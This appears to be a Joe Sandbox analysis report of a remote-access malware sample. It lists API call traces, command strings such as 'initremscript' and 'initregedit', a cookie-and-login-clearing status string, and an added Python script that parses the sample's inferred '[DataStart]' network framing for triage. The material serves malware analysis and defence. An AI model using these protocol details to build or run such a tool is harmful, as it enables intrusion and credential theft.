                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                              • String ID: [Cleared all cookies & stored logins!]
                              • API String ID: 3797260644-1894301085
                              • Opcode ID: f199ca515fe3fd297484eb2075cc4a307752a8c1ca9959e62230d6bf913dfe67
                              • Instruction ID: 743c0b0ad3dce683d62215772fc1dcfb9b2edba61c8a76df2461d73b0dcd023a
                              • Opcode Fuzzy Hash: f199ca515fe3fd297484eb2075cc4a307752a8c1ca9959e62230d6bf913dfe67
                              • Instruction Fuzzy Hash: 8F31F461D4A7C8B9EB12E3F555165DF7E748E12200B48C4FFD4C077283D57A0B48976A
                              APIs
                              • RegisterClassExA.USER32(00000030), ref: 0040F9BE
                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0040F9D9
                              • GetLastError.KERNEL32(?,00000000), ref: 0040F9E3
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: ClassCreateErrorLastRegisterWindow
                              • String ID: 0$MsgWindowClass
                              • API String ID: 2877667751-2410386613
                              • Opcode ID: 4b35dbec49bb3aac694837bfd24467ddf9e7bcdb7fb055d8e4ccf1cf56f59604
                              • Instruction ID: 3bd77cc2a02a113e4efc25ff9f0a79e0b482d680b5cc203598e7dfc1cb382988
                              • Opcode Fuzzy Hash: 4b35dbec49bb3aac694837bfd24467ddf9e7bcdb7fb055d8e4ccf1cf56f59604
                              • Instruction Fuzzy Hash: 93015AB1D01228AACB21DF96EC48ADFBFBDEF45760F004126F510B6280D7B05549CBE4
                              APIs
                                • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initremscript,00415268,?,?,?,?,?,?,?,?,?,?,?,?,0040BC44), ref: 0040D1CF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040D1D9
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040D1EB
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                                • Part of subcall function 0040221C: malloc.MSVCRT ref: 00402248
                                • Part of subcall function 0040221C: recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                                • Part of subcall function 0040221C: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                                • Part of subcall function 0040221C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                • Part of subcall function 0040221C: free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040D3A5,00000001,?,?,?,?,?,?), ref: 0040D202
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V?$basic_string@$??4?$basic_string@V10@0@V10@@Y?$basic_string@connectfreemallocrecvsocket
                              • String ID: initremscript
                              • API String ID: 1984283922-2453072461
                              • Opcode ID: a3a1c512a8bbe3034cfa995716c64fccf3b81a4b27426af285bb25f05ea61ccc
                              • Instruction ID: 342a5ca8b5c7f20c834f884bab2930fb133c27a797bcc57ebff7080bfdc51c0c
                              • Opcode Fuzzy Hash: a3a1c512a8bbe3034cfa995716c64fccf3b81a4b27426af285bb25f05ea61ccc
                              • Instruction Fuzzy Hash: F5F0A432B4061463D700FAB99D8B9FF7759AA81354B40097EBE016A1C2EAFD9A4C429D
                              APIs
                                • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initregedit,00415268,?,?,?,?,?,?,?,?,?,?,?,?,0040BC72), ref: 00409DD2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00409DDC
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00409DEE
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00415A30,00415940,00415268,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E), ref: 0040222E
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040223B
                                • Part of subcall function 0040221C: malloc.MSVCRT ref: 00402248
                                • Part of subcall function 0040221C: recv.WS2_32(00415A30,00000000,00000000,00000000), ref: 00402259
                                • Part of subcall function 0040221C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040226D
                                • Part of subcall function 0040221C: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402277
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 00402280
                                • Part of subcall function 0040221C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 0040228D
                                • Part of subcall function 0040221C: free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                                • Part of subcall function 0040221C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040976B,00000000,?,?,?,?,?,?), ref: 00409E05
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V?$basic_string@$??4?$basic_string@V10@0@V10@@Y?$basic_string@connectfreemallocrecvsocket
                              • String ID: initregedit
                              • API String ID: 1984283922-4282871991
                              • Opcode ID: f30660b3cfbb667e63d0ae3de9153243f20a977a78a5d049d9f4742b7f6f2b8b
                              • Instruction ID: ea2ab50fb2608594d56e05149f15f1d9e9310a7c1248ba924dfbe77ee24fa733
                              • Opcode Fuzzy Hash: f30660b3cfbb667e63d0ae3de9153243f20a977a78a5d049d9f4742b7f6f2b8b
                              • Instruction Fuzzy Hash: E3F0F93260060467C700BA759D4B9EF77189A81314B40047EBD01BB1C3EAFC8D48429D
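The two functions above (0040D1CF and 00409DD2) and the EnumWindows handler at 0040C9EB all build an outbound message by taking a fixed keyword ("initremscript", "initregedit", "windowslist") as the left operand of operator+, appending string data, and handing the result to the socket helpers at 00402109/00402168/00402504. The send helper 00402504, listed further down in this report, constructs the string "[DataStart]" followed by four placeholder bytes, patches the bytes at index 11 via operator[], appends the payload and calls send. The following Python is an added triage example written for this report; it is not Joe Sandbox output and not code from the sample. It assumes, from that listing, that the four bytes after "[DataStart]" hold a little-endian payload length (x86 native byte order, and ?length@ is called on the payload before the header is built); the direction of the messages, the delimiter between keyword and data, and the sample bytes are constructed assumptions, not facts from the page.

```python
import struct

# Markers taken from the API/String listings in this report. Everything else
# (header layout, sample bytes) is an assumption made for this added example.
MAGIC = b"[DataStart]"                 # 11 bytes; 00402504 builds "[DataStart]" + 4 placeholder bytes
HDR_LEN = len(MAGIC) + 4               # placeholder sits at string index 11, patched via operator[]
COMMAND_KEYWORDS = (b"initremscript", b"initregedit", b"windowslist")   # left operand of operator+
STATUS_MARKERS = (b"[Cleared all cookies & stored logins!]", b"[IE cookies cleared!]")
OTHER_MARKERS = (b"MsgWindowClass",)   # window class registered at 0040F9BE


def frame(payload: bytes) -> bytes:
    """Build one packet the way 00402504 appears to: magic, 4-byte length, payload.
    Assumption: the length is little-endian and counts only the payload."""
    return MAGIC + struct.pack("<I", len(payload)) + payload


def unframe(stream: bytes):
    """Split a captured byte stream into payloads.
    Returns (payloads, remainder): parsing stops at the first frame that is
    truncated or does not start with the magic, so a partial recv() can be
    re-fed once more bytes arrive."""
    payloads, pos = [], 0
    while len(stream) - pos >= HDR_LEN:
        if stream[pos:pos + len(MAGIC)] != MAGIC:
            break
        (n,) = struct.unpack_from("<I", stream, pos + len(MAGIC))
        if len(stream) - pos - HDR_LEN < n:
            break
        payloads.append(stream[pos + HDR_LEN:pos + HDR_LEN + n])
        pos += HDR_LEN + n
    return payloads, stream[pos:]


def classify(payload: bytes) -> str:
    """Label a payload by the keyword concatenated at its start (the listing shows
    the keyword as the left operand of operator+) or by an embedded status string."""
    for kw in COMMAND_KEYWORDS:
        if payload.startswith(kw):
            return "keyword:" + kw.decode()
    for marker in STATUS_MARKERS:
        if marker in payload:
            return "status:" + marker.decode()
    return "unknown"


def scan_dump(blob: bytes) -> dict:
    """Count non-overlapping occurrences of every marker in a raw memory dump
    (for instance the .sdmp file named in this report) as a quick triage step."""
    markers = (MAGIC,) + COMMAND_KEYWORDS + STATUS_MARKERS + OTHER_MARKERS
    return {m.decode(): blob.count(m) for m in markers}


# Constructed sample, not real traffic or a real dump: a few unrelated bytes,
# the window class name, two framed messages and one status string.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"MsgWindowClass\x00"
    + frame(b"windowslist" + b"\x00constructed\x00")
    + b"junk"
    + frame(b"initregedit")
    + b"[IE cookies cleared!]"
)

if __name__ == "__main__":
    for marker, count in scan_dump(SAMPLE_DUMP).items():
        print(f"{count:3d}  {marker}")
    payloads, rest = unframe(SAMPLE_DUMP[SAMPLE_DUMP.index(MAGIC):])
    print([classify(p) for p in payloads], len(rest), "trailing bytes")
```

Run scan_dump over the real .sdmp to confirm the same markers are present before spending time on the framing; unframe is only meaningful on a byte stream that actually starts at a "[DataStart]" header, which is why the usage line slices the sample at the first magic.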
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                              • String ID: dt@
                              • API String ID: 2505548081-2366654348
                              • Opcode ID: 61a749066b2d00b9c9c648641962aeee84050e9aec5808d4299b9fd5b26a7e54
                              • Instruction ID: 764d4db823161b876fc7299956acb260e9b2acb34382fd8d294e8e186b4e9337
                              • Opcode Fuzzy Hash: 61a749066b2d00b9c9c648641962aeee84050e9aec5808d4299b9fd5b26a7e54
                              • Instruction Fuzzy Hash: B7F0D43150001EEBCF04EF94DC98CEE7B78FB54305B008469B916921A0EBB4AA59CB94
                              APIs
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F10,00000000,00415940,?,00407B0B,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00403787
                                • Part of subcall function 0040374A: GetKeyboardLayout.USER32(00000000), ref: 0040374F
                              • CreateThread.KERNEL32(00000000,00000000,0040382C,004156C0,00000000,00000000), ref: 004037A6
                              • CreateThread.KERNEL32(00000000,00000000,0040380C,004156C0,00000000,00000000), ref: 004037B6
                              • CreateThread.KERNEL32(00000000,00000000,0040383B,004156C0,00000000,00000000), ref: 004037C2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407B0B,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004037C7
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??4?$basic_string@KeyboardLayoutV01@V01@@
                              • String ID:
                              • API String ID: 2295282396-0
                              • Opcode ID: 14f04f78e8f7430bc4bd69958249ffd5d817d18415e9be8f89f862f13594ae1e
                              • Instruction ID: 83acec77044f58d1f3a1298fcc2b8004ba63f5c21448a1edded433463e12b57e
                              • Opcode Fuzzy Hash: 14f04f78e8f7430bc4bd69958249ffd5d817d18415e9be8f89f862f13594ae1e
                              • Instruction Fuzzy Hash: 46F090721002947AC231AB239C8CDEB3FBCDAD7F65710807EF44612181CAB89945C2B9
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040EF60
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040EF72
                              • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0040EF7E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040EF9F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EFA8
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                              • String ID:
                              • API String ID: 1435062097-0
                              • Opcode ID: 20075cc94b158e45fadc6d86183d5be30a195f63fcca5debc30167b5daaf2194
                              • Instruction ID: 6b6ba2759fc20d09fe660d68a9c76a1e637e25a4b848d32c772961ab34e95e59
                              • Opcode Fuzzy Hash: 20075cc94b158e45fadc6d86183d5be30a195f63fcca5debc30167b5daaf2194
                              • Instruction Fuzzy Hash: CE019E7540015AEFCB008F64DC889EE7BB8FF48314F008455EC5697280DA749A44CB50
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403701
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040370E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040371B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403728
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403735
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                              • String ID:
                              • API String ID: 4257247948-0
                              • Opcode ID: 282da47049af24501e856da2357ac17247e55dafe8a2a8a5931536da7051f424
                              • Instruction ID: dac1581c1d28e517801eb3be04acf8c600069e7031f390e60f55bb430ac4377d
                              • Opcode Fuzzy Hash: 282da47049af24501e856da2357ac17247e55dafe8a2a8a5931536da7051f424
                              • Instruction Fuzzy Hash: B2F0C97140461AAFCB14DFA4DC8C9DAB7FCFE5820870008A9A183D3510EA75F64ACB54
                              APIs
                              • socket.WS2_32(00000000,00000001,00000006), ref: 004025F9
                              • connect.WS2_32(00000000,00415278,00000010), ref: 00402608
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000006,?,?,00408D8C), ref: 0040261B
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                • Part of subcall function 00402504: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                • Part of subcall function 00402504: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                • Part of subcall function 00402504: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                • Part of subcall function 00402504: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                • Part of subcall function 00402504: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 00402584
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                              • closesocket.WS2_32(00000000), ref: 00402630
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00415278,00000010,00000000,00000001,00000006,?,?,00408D8C), ref: 0040263B
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@V01@@$??4?$basic_string@?data@?$basic_string@?empty@?$basic_string@A?$basic_string@D@1@@D@2@@0@Hstd@@V01@V10@0@V?$basic_string@closesocketconnectsendsocket
                              • String ID:
                              • API String ID: 2015417588-0
                              • Opcode ID: afd6ee4ba49ead645863e6814483f123e0b3b1fe0a8a6986ee26414a986e6055
                              • Instruction ID: 3ac3c1af87fc4ba09d50238af9d46122a468a8ea4431591f33cc56d3a1d2174b
                              • Opcode Fuzzy Hash: afd6ee4ba49ead645863e6814483f123e0b3b1fe0a8a6986ee26414a986e6055
                              • Instruction Fuzzy Hash: 42F0A73164111537D62076759D0ABDB3A188B12795F00017AFD05B61C1EAF9894482DD
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040E4FD
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040E511
                              • ?find_last_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411844,6A3F5E04), ref: 0040E526
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040E535
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E53E
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?find_last_of@?$basic_string@?substr@?$basic_string@D@1@@FileModuleNameV12@
                              • String ID:
                              • API String ID: 2641972318-0
                              • Opcode ID: d402ba14c3a2e1978bc613bd61c4e803cb42440e16ad61c5612e90c530be73d1
                              • Instruction ID: 1e1a59f65a474f258a2f266179515592e576b6157cd272470b44933d2ea38500
                              • Opcode Fuzzy Hash: d402ba14c3a2e1978bc613bd61c4e803cb42440e16ad61c5612e90c530be73d1
                              • Instruction Fuzzy Hash: 83F0D07150010FEFDF44DF94ED4AFED7B78EB04309F108061B605A61A0DAB0AA89CF65
                              APIs
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004156C0,76F93520,00405285), ref: 00405213
                              • DeleteFileA.KERNEL32(00000000), ref: 0040521A
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00415660,00410668), ref: 0040522E
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040523C
                              • RemoveDirectoryA.KERNEL32(00000000), ref: 00405243
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@$??9std@@D@2@@0@DeleteDirectoryFileRemoveV?$basic_string@
                              • String ID:
                              • API String ID: 485653077-0
                              • Opcode ID: 3979d79b3fe9aba7c53ae26c4f3c4978edfa256f4a3cec73ad257c73c55fecea
                              • Instruction ID: 49b04f277348f71567298f07d152f4b3d3d547bd3422a61795910190b4fb5562
                              • Opcode Fuzzy Hash: 3979d79b3fe9aba7c53ae26c4f3c4978edfa256f4a3cec73ad257c73c55fecea
                              • Instruction Fuzzy Hash: C3E086762416219BCA041BF0AC0C9CB371CAE45212300417BF402E36A0CFF98CC48B5C
                              APIs
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036C7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036D0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036D9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036E2
